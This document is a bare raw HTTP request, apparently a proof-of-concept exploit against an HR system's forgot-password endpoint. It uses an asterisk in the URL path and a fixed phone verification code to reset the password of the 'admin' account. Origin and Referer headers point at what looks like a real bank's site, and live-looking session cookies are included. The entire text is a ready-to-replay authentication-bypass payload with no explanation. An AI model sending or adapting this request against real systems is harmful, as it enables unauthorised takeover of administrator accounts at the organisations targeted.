POST /api/hrm/forgotPassword/forgotPasswordTo*Next HTTP/1.1
Host: www.baidu.com
Cookie: BIGipServerdcp_ucsps_8080_pool=193335562.36895.0000; BIGipServerdcp_netngx_8080_pool=3555266826.36895.0000; JSESSIONID=A2C94624278834E66EF68BD88DBBD2D5; __clusterSessionIDCookieName=731c532b-7462-486c-bbd5-93fdd83440f7; __clusterSessionCookieName=6278DCD2C262910594102C26155DAB3D; __randcode__=48094936-65c5-4eb3-b02d-6af64b88c7df
Content-Length: 197
User-Agent: Mozilla/5.0 (Linux; Android 10; Pixel 2 Build/QQ3A.200805.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.152 Mobile Safari/537.36 E-Mobile7/7.0.43.20210303 Language/zh Qiyuesuo/physicalSDK
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Origin: https://tudcp.bocfullertonbank.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://tudcp.bocfullertonbank.com/spa/hrm/static4mobile/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

languageId=7&type=phoneCode&loginid=admin&validatecode=3707&id=30&phoneCode=1234&ismobile=1&_ec_ismobile=true&_ec_browser=EMobile&_ec_browserVersion=7.0.43.20210303&_ec_os=Android&_ec_osVersion=10&